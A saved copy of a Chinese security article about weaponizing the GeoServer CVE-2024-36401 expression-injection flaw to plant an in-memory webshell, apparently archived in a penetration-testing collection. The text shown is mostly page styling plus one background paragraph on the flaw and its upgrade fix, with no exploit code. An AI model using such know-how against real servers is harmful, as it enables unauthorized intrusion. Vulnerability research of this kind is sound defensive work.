Penetration_Testing_POC/books/GeoServer property RCE注入内存马.html


<!DOCTYPE html> <html class style><!--
Page saved with SingleFile
url: https://mp.weixin.qq.com/s/beRJ8-HOMJbA43jYMMS0Pg
--><meta charset=utf-8><style>body{transition:opacity ease-in .2s}</style>
<meta name=wechat-enable-text-zoom-em content=true>
<meta http-equiv=X-UA-Compatible content="IE=edge">
<meta name=color-scheme content="light dark">
<meta name=viewport content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0,viewport-fit=cover">
<meta name=apple-mobile-web-app-capable content=yes>
<meta name=apple-mobile-web-app-status-bar-style content=black>
<meta name=format-detection content="telephone=no">
<meta name=description content=表达式注入的武器化利用>
<meta name=author content=yzddMr6>
<meta property=og:title content="GeoServer property RCE注入内存马">
<meta property=og:url content="http://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&amp;mid=2247484076&amp;idx=1&amp;sn=4064cb6a006f5cc454b7fb982e8ab9c6&amp;chksm=ce130559f9648c4fd7a60bc35aa5e3d5402b9ac5fbd154c8ed90695c40055dbe83ff9ee5ea38#rd">
<meta property=og:image content="https://mmbiz.qpic.cn/sz_mmbiz_jpg/LtiayO136fU4IFpKSwoqKg8ic71tJicvTeUn0ICS2QFzu8og5ibJLxKodK6fqQfY5icxOcYD1DZVHqPrI1UFkeO8HPQ/0?wx_fmt=jpeg">
<meta property=og:description content=表达式注入的武器化利用>
<meta property=og:site_name content="Weixin Official Accounts Platform">
<meta property=og:type content=article>
<meta property=og:article:author content=yzddMr6>
<meta property=twitter:card content=summary>
<meta property=twitter:image content="https://mmbiz.qpic.cn/sz_mmbiz_jpg/LtiayO136fU4IFpKSwoqKg8ic71tJicvTeUn0ICS2QFzu8og5ibJLxKodK6fqQfY5icxOcYD1DZVHqPrI1UFkeO8HPQ/0?wx_fmt=jpeg">
<meta property=twitter:title content="GeoServer property RCE注入内存马">
<meta property=twitter:creator content=yzddMr6>
<meta property=twitter:site content="Weixin Official Accounts Platform">
<meta property=twitter:description content=表达式注入的武器化利用>
<title>GeoServer property RCE注入内存马</title>
<style>@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-0:#111;--weui-BG-1:#1e1e1e;--weui-BG-2:#191919;--weui-BG-3:#202020;--weui-BG-4:#404040;--weui-BG-5:#2c2c2c;--weui-BLUE-100:#10aeff;--weui-BLUE-120:#0c8bcc;--weui-BLUE-170:#04344d;--weui-BLUE-80:#3fbeff;--weui-BLUE-90:#28b6ff;--weui-BLUE-BG-100:#48a6e2;--weui-BLUE-BG-110:#4095cb;--weui-BLUE-BG-130:#32749e;--weui-BLUE-BG-90:#5aafe4;--weui-BRAND-100:#07c160;--weui-BRAND-120:#059a4c;--weui-BRAND-170:#023a1c;--weui-BRAND-80:#38cd7f;--weui-BRAND-90:#20c770;--weui-BRAND-BG-100:#2aae67;--weui-BRAND-BG-110:#259c5c;--weui-BRAND-BG-130:#1d7a48;--weui-BRAND-BG-90:#3eb575;--weui-FG-0:rgba(255,255,255,.8);--weui-FG-0_5:rgba(255,255,255,.6);--weui-FG-1:rgba(255,255,255,.5);--weui-FG-2:rgba(255,255,255,.3);--weui-FG-3:rgba(255,255,255,.1);--weui-FG-4:rgba(255,255,255,.15);--weui-GLYPH-0:rgba(255,255,255,.8);--weui-GLYPH-1:rgba(255,255,255,.5);--weui-GLYPH-2:rgba(255,255,255,.3);--weui-GLYPH-WHITE-0:rgba(255,255,255,.8);--weui-GLYPH-WHITE-1:rgba(255,255,255,.5);--weui-GLYPH-WHITE-2:rgba(255,255,255,.3);--weui-GLYPH-WHITE-3:#fff;--weui-GREEN-100:#74a800;--weui-GREEN-120:#5c8600;--weui-GREEN-170:#233200;--weui-GREEN-80:#8fb933;--weui-GREEN-90:#82b01a;--weui-GREEN-BG-100:#789833;--weui-GREEN-BG-110:#6b882d;--weui-GREEN-BG-130:#65802b;--weui-GREEN-BG-90:#85a247;--weui-INDIGO-100:#1196ff;--weui-INDIGO-120:#0d78cc;--weui-INDIGO-170:#052d4d;--weui-INDIGO-80:#40abff;--weui-INDIGO-90:#28a0ff;--weui-INDIGO-BG-100:#0d78cc;--weui-INDIGO-BG-110:#0b6bb7;--weui-INDIGO-BG-130:#09548f;--weui-INDIGO-BG-90:#2585d1;--weui-LIGHTGREEN-100:#3eb575;--weui-LIGHTGREEN-120:#31905d;--weui-LIGHTGREEN-170:#123522;--weui-LIGHTGREEN-80:#64c390;--weui-LIGHTGREEN-90:#51bc83;--weui-LIGHTGREEN-BG-100:#31905d;--weui-LIGHTGREEN-BG-110:#2c8153;--weui-LIGHTGREEN-BG-130:#226541;--weui-LIGHTGREEN-BG-90:#31905d;--weui-LINK-100:#7d90a9;--weui-LINK-120:#647387;--weui-LINK
-170:#252a32;--weui-LINK-80:#97a6ba;--weui-LINK-90:#899ab1;--weui-LINKFINDER-100:#dee9ff;--weui-MATERIAL-ATTACHMENTCOLUMN:rgba(32,32,32,.93);--weui-MATERIAL-NAVIGATIONBAR:rgba(18,18,18,.9);--weui-MATERIAL-REGULAR:rgba(37,37,37,.6);--weui-MATERIAL-THICK:rgba(34,34,34,.9);--weui-MATERIAL-THIN:rgba(95,95,95,.4);--weui-MATERIAL-TOOLBAR:rgba(35,35,35,.93);--weui-ORANGE-100:#c87d2f;--weui-ORANGE-120:#a06425;--weui-ORANGE-170:#3b250e;--weui-ORANGE-80:#d39758;--weui-ORANGE-90:#cd8943;--weui-ORANGE-BG-100:#bb6000;--weui-ORANGE-BG-110:#a85600;--weui-ORANGE-BG-130:#824300;--weui-ORANGE-BG-90:#c1701a;--weui-ORANGERED-100:#ff6146;--weui-OVERLAY:rgba(0,0,0,.8);--weui-OVERLAY-WHITE:rgba(242,242,242,.8);--weui-PURPLE-100:#8183ff;--weui-PURPLE-120:#6768cc;--weui-PURPLE-170:#26274c;--weui-PURPLE-80:#9a9bff;--weui-PURPLE-90:#8d8fff;--weui-PURPLE-BG-100:#6768cc;--weui-PURPLE-BG-110:#5c5db7;--weui-PURPLE-BG-130:#48498f;--weui-PURPLE-BG-90:#7677d1;--weui-RED-100:#fa5151;--weui-RED-120:#c84040;--weui-RED-170:#4b1818;--weui-RED-80:#fb7373;--weui-RED-90:#fa6262;--weui-RED-BG-100:#cf5148;--weui-RED-BG-110:#ba4940;--weui-RED-BG-130:#913832;--weui-RED-BG-90:#d3625a;--weui-SECONDARY-BG:rgba(255,255,255,.1);--weui-SEPARATOR-0:rgba(255,255,255,.05);--weui-SEPARATOR-1:rgba(255,255,255,.15);--weui-STATELAYER-HOVERED:rgba(0,0,0,.02);--weui-STATELAYER-PRESSED:rgba(255,255,255,.1);--weui-STATELAYER-PRESSEDSTRENGTHENED:rgba(255,255,255,.2);--weui-YELLOW-100:#cc9c00;--weui-YELLOW-120:#a37c00;--weui-YELLOW-170:#3d2f00;--weui-YELLOW-80:#d6af33;--weui-YELLOW-90:#d1a519;--weui-YELLOW-BG-100:#bf9100;--weui-YELLOW-BG-110:#ab8200;--weui-YELLOW-BG-130:#866500;--weui-YELLOW-BG-90:#c59c1a;--weui-FG-HALF:rgba(255,255,255,.6);--weui-RED:#fa5151;--weui-ORANGERED:#ff6146;--weui-ORANGE:#c87d2f;--weui-YELLOW:#cc9c00;--weui-GREEN:#74a800;--weui-LIGHTGREEN:#3eb575;--weui-TEXTGREEN:#259c5c;--weui-BRAND:#07c160;--weui-BLUE:#10aeff;--weui-INDIGO:#1196ff;--weui-PURPLE:#8183ff;--weui-LINK:#7d90a9;--weui-REDORANGE:#ff6146;--we
ui-TAG-TEXT-BLACK:rgba(255,255,255,.5);--weui-TAG-BACKGROUND-BLACK:rgba(255,255,255,.05);--weui
<style>@-webkit-keyframes txp_barrage{0%{-webkit-transform:translateX(0);transform:translate(0);opacity:1}90%{opacity:1}to{-webkit-transform:translateX(-2800px);transform:translate(-2800px);opacity:0}}@keyframes txp_barrage{0%{-webkit-transform:translateX(0);transform:translate(0);opacity:1}90%{opacity:1}to{-webkit-transform:translateX(-2800px);transform:translate(-2800px);opacity:0}}@-webkit-keyframes txp_barrage_plusone{0%{-webkit-transform:translateY(0);transform:translateY(0);opacity:1}to{-webkit-transform:translateY(-40px);transform:translateY(-40px);opacity:0}}@keyframes txp_barrage_plusone{0%{-webkit-transform:translateY(0);transform:translateY(0);opacity:1}to{-webkit-transform:translateY(-40px);transform:translateY(-40px);opacity:0}}@-webkit-keyframes txp_barrage_star{0%{-webkit-transform:rotate(0) scale(1);transform:rotate(0) scale(1)}50%{-webkit-transform:rotate(180deg) scale(1.1);transform:rotate(180deg) scale(1.1)}to{-webkit-transform:rotate(1turn) scale(1);transform:rotate(1turn) scale(1)}}@keyframes txp_barrage_star{0%{-webkit-transform:rotate(0) scale(1);transform:rotate(0) scale(1)}50%{-webkit-transform:rotate(180deg) scale(1.1);transform:rotate(180deg) scale(1.1)}to{-webkit-transform:rotate(1turn) scale(1);transform:rotate(1turn) scale(1)}}@-webkit-keyframes txp_barrage_item_star_show{0%{opacity:0}to{opacity:1}}@keyframes txp_barrage_item_star_show{0%{opacity:0}to{opacity:1}}@-webkit-keyframes txp_barrage_item_star{0%{top:200px}to{top:15px}}@keyframes txp_barrage_item_star{0%{top:200px}to{top:15px}}@keyframes txp_barrage_item_show{0%{opacity:0}5%{opacity:1}95%{opacity:1}to{opacity:0}}@-webkit-keyframes 
txp_barrage_item_show{0%{opacity:0}5%{opacity:1}95%{opacity:1}to{opacity:0}}@media(max-width:1269px){}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-ACTIVE-MASK:rgba(255,255,255,.1)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-DEFAULT-ACTIVE-BG:rgba(255,255,255,.126)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-DIALOG-LINE-COLOR:rgba(255,255,255,.1)}}.weui-wa-hotarea_before:before,.weui-wa-hotarea:after{content:"";pointer-events:auto;position:absolute;top:50%;left:50%;-ms-transform:translate(-50%,-50%);transform:translate(-50%,-50%);min-width:44px;min-height:44px;width:100%;height:100%}body .weui-wa-hotarea_before:before,body .weui-wa-hotarea:after{pointer-events:auto}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-COLOR-ACTIVE:#373737}}.weui-flex{display:-ms-flexbox}.weui-link{-webkit-tap-highlight-color:rgba(0,0,0,0)}.weui-link:visited{color:var(--weui-LINK)}.weui-link:active{opacity:.5}.weui-btn{-webkit-tap-highlight-color:rgba(0,0,0,0);-webkit-user-select:none;-ms-user-select:none}.weui-btn:active:before{content:"";position:absolute;top:0;left:0;width:100%;height:100%;background-color:var(--weui-BTN-ACTIVE-MASK);border-radius:8px}.weui-btn_default:not(.weui-btn_disabled):visited{color:var(--weui-FG-0)}.weui-btn_primary:not(.weui-btn_disabled):visited{color:#fff}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}@keyframes circleLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@-webkit-keyframes weuiLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@keyframes weuiLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@keyframes 
weuiAudioPlaying{30%{-webkit-mask-image:url(data:image/svg+xml;charset=utf8,%3Csvg\ xmlns=\'http://www.w3.org/2000/svg\'\ width=\'24\'\ height=\'24\'\ viewBox=\'0\ 0\ 24\ 24\'%3E\ \ %3Cpath\ fill=\'%2307C160\'\ d=\'M7.97\ 15a4.251\ 4.251\ 0\ 0\ 0\ 1.23-3\ 4.25\ 4.25\ 0\ 0\ 0-1.23-3L5\ 12l2.97\ 3z\'/%3E%3C/svg%3E);mask-image:url(data:image/svg+xml;charset=utf8,%3Csvg\ xmlns=\'http://www.w3.org/2000/svg\'\ width=\'24\'\ height=\'24\'\ viewBox=\'0\ 0\ 24\ 24\'%3E\ \ %3Cpath\ fill=\'%2307C160\'\ d=\'M7.97\ 15a4.251\
<style>@media(prefers-color-scheme:dark){}@media screen and (min-width:717px){}</style>
<style>@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-COLOR-ACTIVE:#373737}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-ACTIVE-MASK:rgba(255,255,255,.1)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-DEFAULT-ACTIVE-BG:rgba(255,255,255,.126)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-DIALOG-LINE-COLOR:rgba(255,255,255,.1)}}.weui-half-screen-dialog{display:-ms-flexbox;-ms-flex-direction:column}@media only screen and (max-device-height:558px){}.weui-half-screen-dialog__bd{-ms-flex:1;-webkit-hyphens:auto;-ms-hyphens:auto}.weui-half-screen-dialog__ft .weui-btn:nth-last-child(n+2),.weui-half-screen-dialog__ft .weui-btn:nth-last-child(n+2)+.weui-btn{display:inline-block;vertical-align:top;margin:0 8px;width:120px}@media(prefers-color-scheme:dark){}.weui-half-screen-dialog__btn-area{display:-ms-flexbox;-ms-flex-align:center;-ms-flex-pack:center}.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2),.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2)+.weui-btn{margin:0 8px;width:136px}.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2):first-child,.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2)+.weui-btn:first-child{margin-left:0}.weui-half-screen-dialog__btn-area .weui-btn:nth-last-child(n+2):last-child,.weui-half-screen-dialog__btn-area 
.weui-btn:nth-last-child(n+2)+.weui-btn:last-child{margin-right:0}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-0:#111;--weui-BG-1:#1e1e1e;--weui-BG-5:#2c2c2c;--weui-RED:#fa5151;--weui-ORANGERED:#ff6146;--weui-ORANGE:#c87d2f;--weui-YELLOW:#cc9c00;--weui-GREEN:#74a800;--weui-LIGHTGREEN:#3eb575;--weui-BRAND:#07c160;--weui-BLUE:#10aeff;--weui-INDIGO:#1196ff;--weui-PURPLE:#8183ff;--weui-LINK:#7d90a9;--weui-TEXTGREEN:#259c5c;--weui-REDORANGE:#ff6146;--weui-BG-0:#111;--weui-BG-1:#1e1e1e;--weui-BG-2:#191919;--weui-BG-3:#202020;--weui-BG-4:#404040;--weui-BG-5:#2c2c2c;--weui-BLUE-100:#10aeff;--weui-BLUE-120:#0c8bcc;--weui-BLUE-170:#04344d;--weui-BLUE-80:#3fbeff;--weui-BLUE-90:#28b6ff;--weui-BLUE-BG-100:#48a6e2;--weui-BLUE-BG-110:#4095cb;--weui-BLUE-BG-130:#32749e;--weui-BLUE-BG-90:#5aafe4;--weui-BRAND-100:#07c160;--weui-BRAND-120:#059a4c;--weui-BRAND-170:#023a1c;--weui-BRAND-80:#38cd7f;--weui-BRAND-90:#20c770;--weui-BRAND-BG-100:#2aae67;--weui-BRAND-BG-110:#259c5c;--weui-BRAND-BG-130:#1d7a48;--weui-BRAND-BG-90:#3eb575;--weui-FG-0:rgba(255,255,255,.8);--weui-FG-0_5:rgba(255,255,255,.6);--weui-FG-1:rgba(255,255,255,.5);--weui-FG-2:rgba(255,255,255,.3);--weui-FG-3:rgba(255,255,255,.1);--weui-FG-4:rgba(255,255,255,.15);--weui-GLYPH-0:rgba(255,255,255,.8);--weui-GLYPH-1:rgba(255,255,255,.5);--weui-GLYPH-2:rgba(255,255,255,.3);--weui-GLYPH-WHITE-0:rgba(255,255,255,.8);--weui-GLYPH-WHITE-1:rgba(255,255,255,.5);--weui-GLYPH-WHITE-2:rgba(255,255,255,.3);--weui-GLYPH-WHITE-3:#fff;--weui-GREEN-100:#74a800;--weui-GREEN-120:#5c8600;--weui-GREEN-170:#233200;--weui-GREEN-80:#8fb933;--weui-GREEN-90:#82b01a;--weui-GREEN-BG-100:#789833;--weui-GREEN-BG-110:#6b882d;--weui-GREEN-BG-130:#65802b;--weui-GREEN-BG-90:#85a247;--weui-INDIGO-100:#1196ff;--weui-INDIGO-120:#0d78cc;--weui-INDIGO-170:#052d4d;--weui-INDIGO-80:#40abff;--weui-INDIGO-90:#28a0ff;--weui-INDIGO-BG-100:#0d78cc;--weui-INDIGO-BG-110:#0b6bb7;--weui-INDIGO-BG-130:#09
548f;--weui-INDIGO-BG-90:#2585d1;--weui-LIGHTGREEN-100:#3eb575;--weui-LIGHTGREEN-120:#31905d;--weui-LIGHTGREEN-170:#123522;--weui-LIGHTGREEN-80:#64c390;--weui-LIGHTGREEN-90:#51bc83;--weui-LIGHTGREEN-BG-100:#31905d;--weui-LIGHTGREEN-BG-110:#2c8153;--weui-LIGHTGREEN-BG-130:#226541;--weui-LIGHTGREEN-BG-90:#31905d;--weui-LINK-100:#7d90a9;--weui-LINK-120:#647387;--weui-LINK-170:#252a32;--weui-LINK-80:#97a6ba;--weui-LINK-90:#899ab1;--weui-LINKFINDER-100:#dee9ff;--weui-MATERIAL-ATTACHMENTCOLUMN:rgba(32,32,32,.
<style>:root{--articleFontsize:17px}h1{font-weight:400}a{-webkit-tap-highlight-color:rgba(0,0,0,0);-webkit-user-drag:none}html{-webkit-text-size-adjust:100%;-webkit-touch-callout:none}body{letter-spacing:.034em;word-wrap:break-word;-webkit-hyphens:auto;-ms-hyphens:auto;hyphens:auto}body.wx_wap_page{font-family:system-ui,-apple-system,BlinkMacSystemFont,Helvetica Neue,PingFang SC,Hiragino Sans GB,Microsoft YaHei UI,Microsoft YaHei,Arial,sans-serif}.rich_media_content{font-size:var(--articleFontsize);overflow:hidden;text-align:justify}.rich_media_content *{max-width:100% !important;box-sizing:border-box !important;-webkit-box-sizing:border-box !important;word-wrap:break-word !important}.rich_media_content p{clear:both;min-height:1em}body{text-underline-position:under;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none;text-underline-offset:.1em}@supports(-webkit-overflow-scrolling:touch){body{text-underline-position:from-font}}.wxw-img{vertical-align:bottom}.autoTypeSetting24psection>p{margin-top:0;margin-bottom:24px}a{color:var(--weui-LINK)}.rich_media_content{color:var(--weui-FG-HALF)}@media(prefers-color-scheme:dark){}body{color:var(--weui-FG-0)}body.mm_appmsg{box-sizing:border-box;padding-bottom:calc(env(safe-area-inset-bottom) + var(--appmsgPageBottomGap))}body.mm_appmsg .rich_media_extra_discuss{padding-bottom:0}body.mm_appmsg .rich_media_extra_discuss:not(.rich_media_extra_discuss_empty){background-color:var(--weui-BG-2)}body.mm_appmsg.wx_wap_page_primary{background-color:var(--weui-BG-2)}.appmsg_skin_default .rich_media_area_primary{background:var(--weui-BG-2)}.rich_media_area_primary{padding:calc(20px + env(safe-area-inset-top)) calc(var(--appmsgPageGap) + env(safe-area-inset-right))0 calc(var(--appmsgPageGap) + 
env(safe-area-inset-left))}.rich_media_title{font-size:22px;line-height:1.4;margin-bottom:14px}@supports(-webkit-overflow-scrolling:touch){.rich_media_title{font-weight:700}}.rich_media_meta_list{margin-bottom:22px;line-height:20px;font-size:0;word-wrap:break-word;-webkit-hyphens:auto;-ms-hyphens:auto;hyphens:auto}.rich_media_meta_list em{font-style:normal}.rich_media_meta_list .weui-wa-hotarea:after{min-height:100%;min-width:100%;padding:5px 4px}.rich_media_meta{display:inline-block;vertical-align:middle;margin:0 10px 10px 0;font-size:15px;-webkit-tap-highlight-color:rgba(0,0,0,0)}.rich_media_meta.appmsg_title_tag{margin-right:8px;overflow:visible}.rich_media_meta_text{color:var(--weui-FG-2)}.rich_media_meta_nickname{position:relative}.rich_media_content{z-index:0}.wx_wap_desktop_fontsize_2 .album_read_card,.wx_wap_desktop_fontsize_2 .rich_media_extra,.wx_wap_desktop_fontsize_2 .rich_media_tool__wrp,.wx_wap_desktop_fontsize_2 .rich_media_wrp{zoom:1}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-ACTIVE-MASK:rgba(255,255,255,.1)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-DEFAULT-ACTIVE-BG:rgba(255,255,255,.126)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-DIALOG-LINE-COLOR:rgba(255,255,255,.1)}}@keyframes circleLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@-webkit-keyframes weuiLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@keyframes 
weuiLoading{0%{transform:rotate3d(0,0,1,0)}to{transform:rotate3d(0,0,1,360deg)}}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}.wx-root,body{--APPMSGCARD-BG:#fafafa}.wx-root[data-weui-theme=dark]{--APPMSGCARD-BG:#1e1e1e}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--APPMSGCARD-BG:#1e1e1e}}.wx-root,body{--APPMSGCARD-LINE-BG:rgba(0,0,0,.07)}.wx-root[data-weui-theme=dark]{--APPMSGCARD-LINE-BG:rgba(255,255,255,.07)}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--APPMSGCARD-LINE-BG:rgba
<style>/*!
* WeUI v2.6.4 (https://github.com/weui/weui)
* Copyright 2023 Tencent, Inc.
* Licensed under the MIT license
*/@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-ACTIVE-MASK:hsla(0,0%,100%,.1)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BTN-DEFAULT-ACTIVE-BG:hsla(0,0%,100%,.126)}}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-DIALOG-LINE-COLOR:hsla(0,0%,100%,.1)}}html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{line-height:1.6}*{margin:0;padding:0;outline:0}a{text-decoration:none;-webkit-tap-highlight-color:rgba(0,0,0,0)}::-webkit-input-placeholder{color:rgba(0,0,0,.3);color:var(--weui-FG-2)}::placeholder{color:rgba(0,0,0,.3);color:var(--weui-FG-2)}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-0:#111;--weui-BG-1:#1e1e1e;--weui-BG-2:#191919;--weui-BG-3:#202020;--weui-BG-4:#404040;--weui-BG-5:#2c2c2c;--weui-FG-0:hsla(0,0%,100%,.8);--weui-FG-HALF:hsla(0,0%,100%,.6);--weui-FG-1:hsla(0,0%,100%,.5);--weui-FG-2:hsla(0,0%,100%,.3);--weui-FG-3:hsla(0,0%,100%,.1);--weui-FG-4:hsla(0,0%,100%,.15);--weui-FG-5:hsla(0,0%,100%,.1);--weui-RED:#fa5151;--weui-REDORANGE:#ff6146;--weui-ORANGE:#c87d2f;--weui-YELLOW:#cc9c00;--weui-GREEN:#74a800;--weui-LIGHTGREEN:#3eb575;--weui-BRAND:#07c160;--weui-BLUE:#10aeff;--weui-INDIGO:#1196ff;--weui-PURPLE:#8183ff;--weui-WHITE:hsla(0,0%,100%,.8);--weui-LINK:#7d90a9;--weui-TEXTGREEN:#259c5c;--weui-FG:#fff;--weui-BG:#000;--weui-TAG-TEXT-RED:rgba(250,81,81,.6);--weui-TAG-BACKGROUND-RED:rgba(250,81,81,.1);--weui-TAG-TEXT-ORANGE:rgba(250,157,59,.6);--weui-TAG-BACKGROUND-ORANGE:rgba(250,157,59,.1);--weui-TAG-TEXT-GREEN:rgba(6,174,86,.6);--weui-TAG-BACKGROUND-GREEN:rgba(6,174,86,.1);--weui-TAG-TEXT-BLUE:rgba(16,174,255,.6);--weui-TAG-BACKGROUND-BLUE:rgba(16,174,255,.1);--weui-TAG-TEXT-BLACK:hsla(0,0%,100%,.5);--weui-TAG-BACKGROUND-BLACK:hsla(0,0%,100%,.05)}}@media(prefers-color-s
cheme:dark){}@media(prefers-color-scheme:dark){.wx-root:not([data-weui-theme=light]),body:not([data-weui-theme=light]){--weui-BG-COLOR-ACTIVE:#373737}}.weui-wa-hotarea{position:relative}.weui-wa-hotarea:after,.weui-wa-hotarea_before:before{content:"";pointer-events:auto;position:absolute;top:50%;left:50%;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);min-width:44px;min-height:44px;width:100%;height:100%}.weui-link{-webkit-tap-highlight-color:rgba(0,0,0,0)}.weui-link,.weui-link:visited{color:#576b95;color:var(--weui-LINK)}.weui-link:active{opacity:.5}.weui-btn{position:relative;display:block;margin-left:auto;margin-right:auto;padding:12px 24px;box-sizing:border-box;font-weight:500;font-size:17px;text-align:center;text-decoration:none;color:#fff;line-height:1.41176471;border-radius:8px;-webkit-tap-highlight-color:rgba(0,0,0,0);-webkit-user-select:none;user-select:none}.weui-btn:active:before{content:"";position:absolute;top:0;left:0;width:100%;height:100%;background-color:rgba(0,0,0,.1);background-color:var(--weui-BTN-ACTIVE-MASK);border-radius:8px}.weui-btn_default{background-color:var(--weui-FG-5)}.weui-btn_default,.weui-btn_default:not(.weui-btn_disabled):visited{color:rgba(0,0,0,.9);color:var(--weui-FG-0)}.weui-btn_primary{background-color:var(--weui-BRAND)}.weui-btn_primary:not(.weui-btn_disabled):visited{color:#fff}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}.weui-btn+.weui-btn{margin-top:16px}@media(prefers-color-scheme:dark){}@media(prefers-color-scheme:dark){}body{--weui-STEPS-DEFAULT-COLOR:var(--weui-FG-3);--weui-STEPS-HIGHLIGHT-COLOR:var(--weui-BRAND);--weui-STEPS-FONT-SIZE:17;--weui-STEPS-LINEHEIGHT:1.4;--weui-STEPS-DOT-SIZE:calc(8/var(--weui-STEPS-FONT-SIZE)*1em);--weui-STEPS-ICON-SIZE:40;--weui-STEPS-VERTICAL-DOT-GAP:calc((1em - 
var(--weui-STEPS-DOT-SIZE))/2);--weui-STEPS-HORIZONAL-DOT-GAP:4px}body{--weui-cellMarginLR:16px;--weui-cellPaddingLR:16px}@media(prefers-color-scheme:dark){}.weui-flex{display:-webkit-box;display:-webkit-flex}@media screen and (min-width:352px){}.weui-half-screen-dialog{dis
<body id=activity-detail class="zh_CN wx_wap_page wx_wap_desktop_fontsize_2 mm_appmsg comment_feature discuss_tab appmsg_skin_default appmsg_style_default pages_skin_pc wx_wap_page_primary not_in_mm">
<div id=js_article style=position:relative class=rich_media>
<div id=js_top_ad_area class=top_banner></div>
<div id=js_base_container class=rich_media_inner>
<div class="wx_row_immersive_stream_wrap sf-hidden" id=js_row_immersive_stream_wrap>
</div>
<div id=page-content class=rich_media_area_primary>
<div class=rich_media_area_primary_inner>
<div id=img-content class=rich_media_wrp>
<h1 class=rich_media_title id=activity-name>
GeoServer property RCE注入内存马
</h1>
<div id=meta_content class=rich_media_meta_list>
<span id=copyright_logo class="wx_tap_link js_wx_tap_highlight rich_media_meta icon_appmsg_tag appmsg_title_tag weui-wa-hotarea">Original</span>
<span class="rich_media_meta rich_media_meta_text">
<span role=link tabindex=0 id=js_author_name class="wx_tap_link js_wx_tap_highlight weui-wa-hotarea" datarewardsn datatimestamp datacanreward=0>yzddMr6</span>
</span>
<span class="rich_media_meta rich_media_meta_nickname" id=profileBt>
<a href=javascript:void(0) class="wx_tap_link js_wx_tap_highlight weui-wa-hotarea" id=js_name>
网络安全回收站 </a>
<div id=js_profile_qrcode aria-hidden=true class=profile_container style=display:none>
</div>
</span>
<span id=meta_content_hide_info>
<em id=publish_time class="rich_media_meta rich_media_meta_text">2024-07-04 21:07</em>
<em id=js_ip_wording_wrp class="rich_media_meta rich_media_meta_text" role=option aria-labelledby="js_a11y_op_ip_wording js_ip_wording" style=display:inline-block><span id=js_a11y_op_ip_wording aria-hidden=true></span><span aria-hidden=true id=js_ip_wording>浙江</span></em>
</span>
</div>
<div class="rich_media_content js_underline_content autoTypeSetting24psection" id=js_content><h2 style='margin-bottom:.5rem;font-weight:700;color:#f85f48;line-height:1.35;font-size:24px;letter-spacing:normal;text-align:start;text-wrap:wrap;font-family:Menlo,Monaco,"Source Code Pro",Consolas,Inconsolata,"Ubuntu Mono","DejaVu Sans Mono","Courier New","Droid Sans Mono","Hiragino Sans GB",微软雅黑,monospace !important;visibility:visible'>背景</h2><p style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start;visibility:visible>GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便地发布地图数据,允许用户对特征数据进行更新、删除、插入操作。在 GeoServer 2.25.1、2.24.3、2.23.5 版本及以前,未登录的任意用户可以通过构造恶意 OGC 请求,在默认安装的服务器中执行 XPath 表达式,进而利用 Apache Commons JXPath 提供的功能执行任意代码(引自 https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/ )。由于该问题无需登录且影响默认安装,仍在运行上述版本或更早版本的实例应尽快升级到官方修复版本。<p 